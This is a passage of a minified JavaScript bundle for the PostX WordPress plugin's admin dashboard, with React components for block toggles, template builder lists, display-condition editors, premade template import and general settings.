i=l[n];return(0,a.createElement)("div",{className:"ultp-dashboard-blocks-group",key:r},p?(0,a.createElement)(a.Fragment,null,(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:180,unit1:"px",size2:32,unit2:"px",br:4}}),(0,a.createElement)("div",{className:"ultp-dashboard-group-blocks"},Array(3).fill(1).map(((e,t)=>(0,a.createElement)("div",{className:"ultp-dashboard-group-blocks-item ultp-dash-item-con",key:t},(0,a.createElement)("div",{className:"ultp-blocks-item-meta"},(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:22,unit1:"px",size2:25,unit2:"px",br:4}}),(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:100,unit1:"px",size2:20,unit2:"px",br:2}})),(0,a.createElement)("div",{className:"ultp-blocks-control-option ultp-dash-control-options"},(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:46,unit1:"px",size2:20,unit2:"px",br:2}}),(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:40,unit1:"px",size2:20,unit2:"px",br:2}}),(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:36,unit1:"px",size2:20,unit2:"px",br:8}}))))))):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp_h5"},i.label),(0,a.createElement)("div",{className:"ultp-dashboard-group-blocks"},Object.keys(i.attr).map(((n,r)=>{const o=i.attr[n];let l=!!o.default;return""==e[n]&&(l="yes"==e[n]),(0,a.createElement)("div",{className:"ultp-dashboard-group-blocks-item ultp-dash-item-con",key:r},(0,a.createElement)("div",{className:"ultp-blocks-item-meta"},(0,a.createElement)("img",{src:`${ultp_dashboard_pannel.url}assets/img/blocks/${o.icon}`,alt:o.label}),(0,a.createElement)("div",null,o.label)),(0,a.createElement)("div",{className:"ultp-blocks-control-option ultp-dash-control-options"},o.docs&&(0,a.createElement)("a",{href:o.docs+"?utm_source=db-postx-blocks&utm_medium=docs&utm_campaign=postx-dashboard",className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},(0,a.createElement)("div",{className:"dashicons dashicons-media-document"}),__("Docs","ultimate-post")),o.live&&(0,a.createElement)("a",{href:o.live,className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},(0,a.createElement)("div",{className:"dashicons dashicons-external"}),__("Live","ultimate-post")),(0,a.createElement)("input",{type:"checkbox",className:"ultp-blocks-enable",id:n,checked:l,onChange:()=>{(n=>{const a=e?.hasOwnProperty(n)&&"yes"!=e[n]?"yes":"";t({...e,[n]:a}),wp.apiFetch({path:"/ultp/v2/addon_block_action",method:"POST",data:{key:n,value:a}}).then((e=>{e.success&&s({status:"success",messages:[e.message],state:!0})}))})(n)}}),(0,a.createElement)("label",{className:"ultp-control__label",htmlFor:n})))})))))})))}},4872:(e,t,n)=>{"use strict";n.d(t,{Z:()=>i});var a=n(7294),r=n(1078),o=n(6765);const{__}=wp.i18n,i=e=>{const{id:t,type:n,settings:i,defaults:l,setShowCondition:s}=e,[p,c]=(0,a.useState)(t&&void 0!==i[n]&&void 0!==i[n][t]?i[n][t]:["include/"+n]),[d,u]=(0,a.useState)({reload:!1,dataSaved:!1});return(0,a.createElement)("div",{className:"ultp-modal-content"},(0,a.createElement)("div",{className:"ultp-condition-wrap"},(0,a.createElement)("div",{className:"ultp_h3"},__("Where Do You Want to Display Your Template?","ultimate-post")),(0,a.createElement)("p",{className:"ultp-description"},__("Set the conditions that determine where your Template is used throughout your site.","ultimate-post")),(0,a.createElement)("div",{className:"ultp-condition-items"},p.map(((e,i)=>{if(e)return(0,a.createElement)("div",{key:i,className:"ultp-condition-wrap__field"},"header"==n||"footer"==n?(0,a.createElement)(r.Z,{key:e,id:t,index:i,type:n,value:e,defaults:l,setChange:(e,t)=>{u({dataSaved:!1});let n=JSON.parse(JSON.stringify(p));n[t]=e,c(n)}}):(0,a.createElement)(o.Z,{key:e,id:t,index:i,type:n,value:e,defaults:l,setChange:(e,t)=>{u({dataSaved:!1});let n=JSON.parse(JSON.stringify(p));n[t]=e,c(n)}}),(0,a.createElement)("span",{className:"dashicons dashicons-no-alt ultp-condition_cancel",onClick:()=>{u({dataSaved:!1});let e=JSON.parse(JSON.stringify(p));e.splice(i,1),c(e)}}))}))),(0,a.createElement)("button",{className:"btnCondition cursor",onClick:()=>{const e="singular"==n?"include/singular/post":"header"==n||"footer"==n?"include/"+n+"/entire_site":"include/"+n;c([...p,e])}},__("Add Conditions","ultimate-post"))),(0,a.createElement)("button",{className:"ultp-save-condition cursor",onClick:()=>{u({reload:!0});let e=Object.assign({},i);void 0!==e[n]||(e[n]={}),e[n][t]=p.filter((e=>e)),wp.apiFetch({path:"/ultp/v2/condition_save",method:"POST",data:{settings:e}}).then((e=>{e.success&&(u({reload:!1,dataSaved:!0}),setTimeout((function(){u({reload:!1,dataSaved:!1}),s&&s("")}),2e3))}))}},d.dataSaved?"Condition Saved.":"Save Condition",(0,a.createElement)("span",{style:{visibility:d.reload?"visible":"hidden"},className:"dashicons dashicons-update rotate ultp-builder-import"})))}},1078:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);const r=e=>{const t=(0,a.useRef)(),{value:n,type:r,defaults:o,setChange:i,index:l}=e,s=n.split("/"),[p,c]=(0,a.useState)([]),[d,u]=(0,a.useState)(!1),[m,f]=(0,a.useState)(!1),[h,g]=(0,a.useState)(s[2]||""),[v,_]=(0,a.useState)(""),w=e=>{null!=t.current&&(t.current.contains(e.target)||u(!1))};(0,a.useEffect)((()=>(s[4]?x(s[4],!0):b(),document.addEventListener("mousedown",w),()=>document.removeEventListener("mousedown",w))),[]);const b=()=>{let e="";const t=s[3];return t&&o[s[2]]&&o[s[2]].forEach((n=>{n.value==t?(e=n.search,f(!0)):n.attr&&n.attr.forEach((n=>{n.value==t&&(e=n.search,f(!0))}))})),e},x=(e,t)=>{wp.apiFetch({path:"/ultp/v2/condition",method:"POST",data:{type:b(),term:e,title_return:t}}).then((e=>{e.success&&(t?_(e.data):c(e.data))}))};return(0,a.createElement)("div",{className:"ultp-condition-fields"},(0,a.createElement)("select",{value:s[0]||"include",onChange:e=>{s.splice(0,1,e.target.value),i(s.join("/"),l)}},(0,a.createElement)("option",{value:"include"},"Include"),(0,a.createElement)("option",{value:"exclude"},"Exclude")),(0,a.createElement)("select",{value:s[2]||"entire_site",onChange:e=>{s.splice(2,1,e.target.value||"entire_site"),s.splice(3),"singular"==e.target.value&&s.push("post"),i(s.join("/"),l)}},o[r].map(((e,t)=>(0,a.createElement)("option",{key:t,value:e.value},e.label)))),s[2]&&"entire_site"!=s[2]&&(0,a.createElement)(a.Fragment,null,(0,a.createElement)("select",{value:s[3]||"",onChange:e=>{const t=e.target.options[e.target.options.selectedIndex].dataset.search;f(!!t),g(""),c([]),s.splice(3,1,e.target.value),s.splice(e.target.value?4:3);const n=s.filter((function(e){return e}));i(n.join("/"),l)}},o[s[2]]&&o[s[2]].map(((e,t)=>e.attr?(0,a.createElement)("optgroup",{label:e.label,key:t},e.attr.map(((e,t)=>!e.attr&&(0,a.createElement)("option",{value:e.value,"data-search":e.search,key:t},e.label)))):(0,a.createElement)("option",{value:e.value,"data-search":e.search,key:t},e.label)))),(m||s[4])&&(0,a.createElement)("div",{ref:t,className:"ultp-condition-dropdown"},(0,a.createElement)("div",{onClick:()=>u(!0),className:`ultp-condition-text ${h&&"ultp-condition-dropdown__content"}`},h&&v?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("span",{className:"ultp-condition-dropdown__label"},v,(0,a.createElement)("span",{className:"dashicons dashicons-no-alt ultp-dropdown-value__close",onClick:()=>{f(!0),g(""),s.splice(4,1,"");const e=s.filter((function(e){return e}));i(e.join("/"),l)}}))):(0,a.createElement)("span",{className:"ultp-condition-dropdown__default"}," ","All"," "),(0,a.createElement)("span",{className:"ultp-condition-arrow dashicons dashicons-arrow-down-alt2"})),d&&(0,a.createElement)("div",{className:"ultp-condition-search"},(0,a.createElement)("input",{type:"text",name:"search",autoComplete:"off",placeholder:"Search",onChange:e=>{x(e.target.value,!1)}}),p.length>0&&(0,a.createElement)("ul",null,p.map(((e,t)=>(0,a.createElement)("li",{key:t,onClick:()=>{u(!1),g(e.value),_(e.title),s.splice(4,1,e.value),i(s.join("/"),l)}},e.title))))))))}},6765:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);const r=e=>{const t=(0,a.useRef)(),{value:n,type:r,defaults:o,setChange:i,index:l}=e,s=n.split("/"),[p,c]=(0,a.useState)([]),[d,u]=(0,a.useState)(!1),[m,f]=(0,a.useState)(!1),[h,g]=(0,a.useState)(s[2]||""),[v,_]=(0,a.useState)(""),w=e=>{null!=t.current&&(t.current.contains(e.target)||u(!1))};(0,a.useEffect)((()=>(s[3]?x(s[3],!0):b(),document.addEventListener("mousedown",w),()=>document.removeEventListener("mousedown",w))),[]);const b=()=>{let e="";const t=s[2];return t&&o[r]&&o[r].forEach((n=>{n.value==t?(e=n.search,f(!0)):n.attr&&n.attr.forEach((n=>{n.value==t&&(e=n.search,f(!0))}))})),e},x=(e,t)=>{wp.apiFetch({path:"/ultp/v2/condition",method:"POST",data:{type:b(),term:e,title_return:t}}).then((e=>{e.success&&(t?_(e.data):c(e.data))}))};return(0,a.createElement)("div",{className:"ultp-condition-fields"},(0,a.createElement)("select",{value:s[0]||"include",onChange:e=>{s[0]=e.target.value,i(s.join("/"),l)}},(0,a.createElement)("option",{value:"include"},"Include"),(0,a.createElement)("option",{value:"exclude"},"Exclude")),(0,a.createElement)("select",{value:s[2]||"post",onChange:e=>{const t=e.target.options[e.target.options.selectedIndex].dataset.search;f(!!t),g(""),c([]),s[2]=e.target.value;const n=s.filter((function(e){return e}));i(n.join("/"),l)}},o[r]&&o[r].map(((e,t)=>e.attr?(0,a.createElement)("optgroup",{label:e.label,key:t},e.attr.map(((e,t)=>(0,a.createElement)("option",{value:e.value,"data-search":e.search,key:t},e.label)))):(0,a.createElement)("option",{value:e.value,"data-search":e.search,key:t},e.label)))),(m||s[3])&&(0,a.createElement)("div",{ref:t,className:"ultp-condition-dropdown"},(0,a.createElement)("div",{onClick:()=>u(!0),className:`ultp-condition-text ${h&&"ultp-condition-dropdown__content"}`},h&&v?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("span",{className:"ultp-condition-dropdown__label"},v,(0,a.createElement)("span",{className:"dashicons dashicons-no-alt ultp-dropdown-value__close",onClick:()=>{f(!0),g(""),s[3]="";const e=s.filter((function(e){return e}));i(e.join("/"),l)}}))):(0,a.createElement)("span",{className:"ultp-condition-dropdown__default"}," ","All"," "),(0,a.createElement)("span",{className:"ultp-condition-arrow dashicons dashicons-arrow-down-alt2"})),d&&(0,a.createElement)("div",{className:"ultp-condition-search"},(0,a.createElement)("input",{type:"text",name:"search",autoComplete:"off",placeholder:"Search",onChange:e=>{x(e.target.value,!1)}}),p.length>0&&(0,a.createElement)("ul",null,p.map(((e,t)=>(0,a.createElement)("li",{key:t,onClick:()=>{u(!1),g(e.value),_(e.title),s[3]=e.value,i(s.join("/"),l)}},e.title)))))))}},8351:(e,t,n)=>{"use strict";n.d(t,{Z:()=>d});var a=n(7462),r=n(7294),o=n(1383),i=n(4766),l=n(356),s=n(4482),p=n(8949),c=n(4872);n(3493);const{__}=wp.i18n,d=e=>{const t=e.has_ultp_condition?ultp_condition:ultp_dashboard_pannel,{notEditor:n}=e,d=["singular","archive","category","search","author","post_tag","date","header","footer","404"],[u,m]=(0,r.useState)(""),[f,h]=(0,r.useState)([]),[g,v]=(0,r.useState)("all"),[_,w]=(0,r.useState)(!1),[b,x]=(0,r.useState)([]),[y,k]=(0,r.useState)(n||""),[E,C]=(0,r.useState)([]),[S,M]=(0,r.useState)(!1),[L,N]=(0,r.useState)(""),[Z,P]=(0,r.useState)([]),[z,A]=(0,r.useState)(""),[B,H]=(0,r.useState)(!1),[T,R]=(0,r.useState)(!1),[O,j]=(0,r.useState)(!1),[V,F]=(0,r.useState)(""),[W,D]=(0,r.useState)(!1),I="yes"==n?wp.data.select("core/editor").getCurrentPostId():"",[U,$]=(0,r.useState)([]),[G,q]=(0,r.useState)(!1),[K,X]=(0,r.useState)({state:!1,status:""}),Q=(0,o.t)(),J=async()=>{await wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"starter_lists"}}).then((e=>{if(e.success&&e.data){const t=JSON.parse(e.data);Y(t)}}))},Y=e=>{const t=[],n=[];e.forEach((e=>{e.templates.forEach((a=>{const r={...a,parentID:e.ID};r.hasOwnProperty("home_page")&&"home_page"==r.home_page&&t.push(r),"ultp_builder"==r.type&&n.push(r)}))})),P(n),$(t)},ee=async()=>{await wp.apiFetch({path:"/ultp/v2/data_builder",method:"POST",data:{pid:I}}).then((e=>{e.success&&Q.current&&(h(e.postlist),x(e.settings),C(e.defaults),m(e.type),j(!0),J())}))};(0,r.useEffect)((()=>(ee(),document.addEventListener("mousedown",ne),()=>document.removeEventListener("mousedown",ne))),[]);const te=(e,t)=>{wp.apiFetch({path:"/ultp/v2/get_single_premade",method:"POST",data:{type:L,ID:e,apiEndPoint:t}}).then((e=>{e.success?(A(""),window.open(e?.link?.replaceAll("&amp;","&"))):(H(!0),A(""),R(!0))}))},ne=e=>{e.target&&!e.target.classList?.contains("ultp-reserve-button")&&(F(""),D(!1))},ae=(e,n)=>{const a=`https://postxkit.wpxpo.com/${e.live}/wp-content/uploads/sites/${e.parentID}/postx_importer_img/pages/${e.name.toLowerCase().replaceAll(" ","_")}.jpg`,o="https://postxkit.wpxpo.com/"+(["header","footer","front_page"].includes(L)?e.live:e.live+"/postx_"+("archive"==e.builder_type?e.archive_type:e.builder_type));return(0,r.createElement)("div",{key:n,className:"ultp-item-list ultp-premade-item"},(0,r.createElement)("div",{className:"listInfo"},(0,r.createElement)("div",{className:"title"},(0,r.createElement)("span",null,e.name),(0,r.createElement)("div",{className:"parent"},e.parent)),e.pro&&!t.active?(0,r.createElement)("a",{className:"ultp-upgrade-pro-btn",target:"_blank",href:`https://www.wpxpo.com/postx/?utm_source=db-postx-builder&utm_medium=${L}-template&utm_campaign=postx-dashboard#pricing`,rel:"noreferrer"},__("Upgrade to Pro","ultimate-post"),"  ➤"):e.pro&&T?(0,r.createElement)("a",{className:"ultp-btn-success",target:"_blank",href:`https://www.wpxpo.com/postx/?utm_source=db-postx-builder&utm_medium=${L}-template&utm_campaign=postx-dashboard#pricing`,rel:"noreferrer"},__("Get License","ultimate-post")):(0,r.createElement)("span",{onClick:()=>{A(e.ID),te(e.ID,"https://postxkit.wpxpo.com/"+e.live)},className:"btnImport cursor"}," ",i.ZP.arrow_down_line,__("Import","ultimate-post"),z&&z==e.ID?(0,r.createElement)("span",{className:"dashicons dashicons-update rotate"}):"")),(0,r.createElement)("div",{className:"listOverlay bg-image-aspect",style:{backgroundImage:`url(${a})`}},(0,r.createElement)("div",{className:"ultp-list-dark-overlay"},(0,r.createElement)("a",{className:"ultp-overlay-view ultp-dashboverlay",href:o,target:"_blank",rel:"noreferrer"},(0,r.createElement)("span",{className:"dashicons dashicons-visibility"})," ",__("Live Preview","ultimate-post")))))},re=()=>"all"!=g&&"archive"!=g?(N(g),v(g),void((Z.length<=0||"front_page"==g&&U.length<=0)&&J())):(0,r.createElement)("div",{className:"ultp-builder-items"},("all"==g?["front_page",...d]:"archive"==g?d.filter((e=>"singular"!=e)):[g]).map(((e,n)=>(0,r.createElement)("div",{key:n,onClick:()=>{N(e),v(e),(Z.length<=0||"front_page"==e&&U.length<=0)&&J()}},(0,r.createElement)("div",{className:"newScreen ultp-item-list ultp-premade-item"},(0,r.createElement)("div",{className:"listInfo"},(0,r.createElement)("div",{className:"ultp_h6"},e)),(0,r.createElement)("div",{className:"listOverlays"},(0,r.createElement)("img",{src:t.url+`addons/builder/assets/icons/template/${e.toLowerCase()}.svg`}),(0,r.createElement)("span",{className:"ultp-list-white-overlay"},(0,r.createElement)("span",{className:"dashicons dashicons-plus-alt"}),__("Add","ultimate-post")," ",e)))))));return(0,r.createElement)("div",{className:"ultp-builder-dashboard"},K.state&&(0,r.createElement)(l.Z,{delay:2e3,toastMessages:K,setToastMessages:X}),!n&&(0,r.createElement)("div",{className:"ultp-builder-dashboard__content ultp-builder-tab"},(0,r.createElement)("div",{className:"ultp-builder-tab__option"},(0,r.createElement)("span",{onClick:()=>(M(!0),void wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"fetch_all_data"}}).then((e=>{e.success&&(ee(),M(!1),X({status:"success",messages:[e.message],state:!0}))}))),className:"ultp-popup-sync"},(0,r.createElement)("i",{className:"dashicons dashicons-update-alt"+(S?" rotate":"")}),__("Synchronize","ultimate-post")),(0,r.createElement)("ul",null,(0,r.createElement)("li",(0,a.Z)({},"all"==g&&{className:"active"},{onClick:()=>{v("all"),w(!1),N("")}}),(0,r.createElement)("span",{className:"dashicons dashicons-admin-home"})," ",__("All Template","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"front_page"==g&&{className:"active"},{onClick:()=>{v("front_page"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/front_page.svg"}),__("Front Page","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"singular"==g&&{className:"active"},{onClick:()=>{v("singular"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/singular.svg"}),__("Singular","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"search"==g&&{className:"active"},{onClick:()=>{v("search"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/search.svg"}),__("Search Result","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"archive"==g&&{className:"active"},{onClick:()=>{v("archive"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/archive.svg"}),__("Archive","ultimate-post")),(0,r.createElement)("ul",null,(0,r.createElement)("li",(0,a.Z)({},"category"==g&&{className:"active"},{onClick:()=>{v("category"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/category.svg"}),__("Category","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"author"==g&&{className:"active"},{onClick:()=>{v("author"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/author.svg"}),__("Authors","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"post_tag"==g&&{className:"active"},{onClick:()=>{v("post_tag"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/tag.svg"}),__("Tags","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"date"==g&&{className:"active"},{onClick:()=>{v("date"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/date.svg"}),__("Date","ultimate-post"))),(0,r.createElement)("li",(0,a.Z)({},"header"==g&&{className:"active"},{onClick:()=>{v("header"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/header.svg"}),__("Header","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"footer"==g&&{className:"active"},{onClick:()=>{v("footer"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/footer.svg"}),__("Footer","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"404"==g&&{className:"active"},{onClick:()=>{v("404"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/404.svg"}),"404"))),(0,r.createElement)("div",{className:"ultp-builder-tab__content ultp-builder-tab__template"},(0,r.createElement)("div",{className:"ultp-builder-tab__heading"},(0,r.createElement)("div",{className:"ultp-builder-heading__title"},(""!=L||_)&&G&&(0,r.createElement)("span",{onClick:()=>{q(!1),w(!1),N("")}}," ",i.ZP.leftAngle2,__("Back","ultimate-post")),(0,r.createElement)("div",{className:"ultp_h5 heading"},__("All","ultimate-post")," ","all"==g?"":g.replace("_"," ")," ",__("Templates","ultimate-post"))),f.length>0&&""==L&&!_?(0,r.createElement)("button",{className:"cursor ultp-primary-button ultp-builder-create-btn",onClick:()=>{w(!0),q(!0),N("all"==g||"archive"==g?"":g)}}," ","+ ",__("Create","ultimate-post")," ","all"==g?"":g.replace("_"," ")," ",__("Template","ultimate-post")):O?"":(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:170,unit1:"px",size2:42,unit2:"px",br:4}})),(0,r.createElement)("div",{className:"ultp-tab__content active"},O?""==L?((e="all")=>{let t=0;return(0,r.createElement)("div",{className:"ultp-template-list__tab"},0==_&&f.length>0?f.map(((n,a)=>{const o=((e,t)=>{let n=[];return e?.id&&void 0!==b[e?.type]&&b[e.type][e.id]?.map(((e,t)=>{e&&(n=e.split("/"))})),n})(n);if("all"==e||e==n.type||e==o[2]&&n.type==o[1]&&!["header","footer"].includes(n.type))return t++,(0,r.createElement)("div",{key:a,className:"ultp-template-list__wrapper"},(0,r.createElement)("div",{className:"ultp-template-list__heading"},(0,r.createElement)("div",{className:"ultp-template-list__meta"},(0,r.createElement)("div",null,(0,r.createElement)("span",null,"front_page"==n.type?"Front Page":n.type," ",":")," ",n.title," ",(0,r.createElement)("span",null,"ID :")," #",n.id),n.id&&void 0!==b[n.type]&&(0,r.createElement)("div",{className:"ultp-condition__previews"},"(",(b[n.type][n.id]||[]).map(((e,t)=>{if(e){const n=e.split("/");return(0,r.createElement)(r.Fragment,{key:t},0==t?"":", ",(0,r.createElement)("span",null,void 0!==n[2]?n[2]:n[1]))}})),")")),(0,r.createElement)("div",{className:"ultp-template-list__control ultp-template-list__content"},"front_page"!=n.type&&"404"!=n.type&&(0,r.createElement)("button",{onClick:()=>{m(n.type),k(n.id)},className:"ultp-condition__edit"},__("Conditions","ultimate-post")),(0,r.createElement)("a",{className:"status"}," ","publish"==n.status?"Published":n.status),(0,r.createElement)("a",{href:n?.edit?.replaceAll("&amp;","&"),className:"ultp-condition-action",target:"_blank",rel:"noreferrer"},(0,r.createElement)("span",{className:"dashicons dashicons-edit-large"}),__("Edit","ultimate-post")),(0,r.createElement)("a",{className:"ultp-condition-action ultp-single-popup__btn cursor",onClick:e=>{e.preventDefault(),confirm("Are you sure you want to duplicate this template?")&&wp.apiFetch({path:"/ultp/v2/template_action",method:"POST",data:{id:n.id,type:"duplicate",section:"builder"}}).then((e=>{e.success&&(ee(),X({status:"success",messages:[e.message],state:!0}))}))}},(0,r.createElement)("span",{className:"dashicons dashicons-admin-page"}),__("Duplicate","ultimate-post")),(0,r.createElement)("a",{className:"ultp-condition-action ultp-single-popup__btn cursor",onClick:e=>{e.preventDefault(),confirm("Are you sure you want to delete this template?")&&wp.apiFetch({path:"/ultp/v2/template_action",method:"POST",data:{id:n.id,type:"delete",section:"builder"}}).then((e=>{e.success&&(h(f.filter((e=>e.id!=n.id))),X({status:"error",messages:[e.message],state:!0}))}))}},(0,r.createElement)("span",{className:"dashicons dashicons-trash"}),__("Delete","ultimate-post")),(0,r.createElement)("span",{onClick:e=>{D(!W),F(n.id)}},(0,r.createElement)("span",{className:"dashicons dashicons-ellipsis ultp-builder-dashboard__action ultp-reserve-button"})),V==n.id&&W&&(0,r.createElement)("span",{className:"ultp-builder-action__active ultp-reserve-button",onClick:e=>{F(""),D(!1),e.preventDefault(),confirm(`Are you sure you want to ${"publish"==n.status?"draft":"publish"} this template?`)&&wp.apiFetch({path:"/ultp/v2/template_action",method:"POST",data:{id:n.id,type:"status",status:"publish"==n.status?"draft":"publish"}}).then((e=>{e.success&&(ee(),X({status:"success",messages:[e.message],state:!0}))}))}},(0,r.createElement)("span",{className:"dashicons dashicons-open-folder ultp-reserve-button"})," ",__("Set to","ultimate-post")," ","publish"==n.status?__("Draft","ultimate-post"):__("Publish","ultimate-post")))))})):re(),0==_&&f.length>0&&!t&&re())})(g):(0,r.createElement)("div",{className:`premadeScreen ${L&&" ultp-builder-items ultp"+L}`},(0,r.createElement)("div",{className:"ultp-list-blank-img ultp-item-list ultp-premade-item"},(0,r.createElement)("div",{className:"ultp-item-list-overlay ultp-p20 ultp-premade-img__blank"},(0,r.createElement)("img",{src:t.url+"assets/img/dashboard/start-scratch.svg"}),(0,r.createElement)("a",{className:"cursor",onClick:e=>{e.preventDefault(),te()}},(0,r.createElement)("span",{className:"ultp-list-white-overlay"},(0,r.createElement)("span",{className:"dashicons dashicons-plus-alt"})," ",__("Start from Scratch","ultimate-post")," ")))),"front_page"==L?U.map(((e,t)=>ae(e,t))):Z.map(((e,t)=>{if("archive"!=e.builder_type&&e.builder_type==L||"archive"==e.builder_type&&(e.archive_type==L||"archive"==L))return ae(e,t)}))):(0,r.createElement)("div",{className:"skeletonOverflow",label:__("Loading…","ultimate-post")},Array(6).fill(1).map(((e,t)=>(0,r.createElement)("div",{key:t,className:"ultp-template-list__tab",style:{marginBottom:"15px"}},(0,r.createElement)("div",{className:"ultp-template-list__wrapper"},(0,r.createElement)("div",{className:"ultp-template-list__heading"},(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:40,unit1:"%",size2:22,unit2:"px",br:2}}),(0,r.createElement)("div",{className:"ultp-template-list__control ultp-template-list__content"},(2==t||4==t)&&(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:20,unit2:"px",br:2}}),(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:42,unit1:"px",size2:20,unit2:"px",br:2}}),(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:42,unit1:"px",size2:20,unit2:"px",br:2}}),(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:56,unit1:"px",size2:20,unit2:"px",br:2}}),(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:25,unit1:"px",size2:12,unit2:"px",br:2}}))))))))))),y&&(0,r.createElement)("div",{className:"ultp-condition-wrapper ultp-condition--active"},(0,r.createElement)("div",{className:"ultp-condition-popup ultp-popup-wrap"},(0,r.createElement)("button",{className:"ultp-save-close",onClick:()=>k("")},i.ZP.close_line),Object.keys(E).length&&u?(0,r.createElement)(c.Z,{type:u,id:"yes"==y?I:y,settings:b,defaults:E,setShowCondition:"yes"==n?k:""}):(0,r.createElement)("div",{className:"ultp-modal-content"},(0,r.createElement)("div",{className:"ultp-condition-wrap"},(0,r.createElement)("div",{className:"ultp_h3 ultp-condition-wrap-heading"},(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:330,unit1:"px",size2:22,unit2:"px",br:2}})),(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:460,unit1:"px",size2:22,unit2:"px",br:2}}),(0,r.createElement)("div",{className:"ultp-condition-items"},(0,r.createElement)("div",{className:"ultp-condition-wrap__field"},(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:30,unit2:"px",br:2}})),(0,r.createElement)("div",{className:"ultp-condition-wrap__field"},(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:30,unit2:"px",br:2}})),(0,r.createElement)("div",{className:"ultp-condition-wrap__field"},(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:30,unit2:"px",br:2}}))))))),B&&(0,s.cs)({tags:"builder_popup",func:e=>{H(e)},data:{icon:"template_lock.svg",title:__("Create Unlimited Templates With PostX Pro","ultimate-post"),description:__("We are sorry. Unfortunately, the free version of PostX lets you create only one template. Please upgrade to a pro version that unlocks the full capabilities of the dynamic site builder.","ultimate-post")}}))}},3944:(e,t,n)=>{"use strict";n.d(t,{Z:()=>p});var a=n(7294),r=n(1383),o=n(4766),i=n(4482),l=n(8949),s=n(356);n(8350);const{__}=wp.i18n,p=()=>{const[e,t]=(0,a.useState)({}),[n,p]=(0,a.useState)({state:!1,status:""}),[c,d]=(0,a.useState)(!1);(0,a.useEffect)((()=>{m()}),[]);const u=(0,r.t)(),m=()=>{wp.apiFetch({path:"/ultp/v2/get_all_settings",method:"POST",data:{key:"key",value:"value"}}).then((e=>{e.success&&u.current&&t(e.settings)}))};return(0,a.createElement)("div",{className:"ultp-dashboard-general-settings-container"},(0,a.createElement)("div",{className:"ultp-general-settings ultp-dash-item-con"},(0,a.createElement)("div",null,n.state&&(0,a.createElement)(s.Z,{delay:2e3,toastMessages:n,setToastMessages:p}),(0,a.createElement)("div",{className:"ultp_h5 heading"},__("General Settings","ultimate-post")),Object.keys(e).length>0?(0,a.createElement)("form",{onSubmit:e=>{d(!0),e.preventDefault();const t=new FormData(e.target),n={};for(const a of e.target.elements)a.name&&("checkbox"!==a.type||a.checked?"select-multiple"===a.type?n[a.name]=t.getAll(a.name):"custom_multiselect"==a.dataset.customprop?n[a.name]=a.value?a.value.split(","):[]:n[a.name]=a.value:n[a.name]="");wp.apiFetch({path:"/ultp/v2/save_plugin_settings",method:"POST",data:{settings:n,action:"action",type:"type"}}).then((e=>{e.success&&p({status:"success",messages:[e.message],state:!0}),d(!1)}))},action:""},(0,i.DC)(i.u4,e),(0,a.createElement)("div",{className:"ultp-data-message"}),(0,a.createElement)("div",null,(0,a.createElement)("button",{type:"submit",className:"cursor ultp-primary-button "+(c?"onloading":"")},__("Save 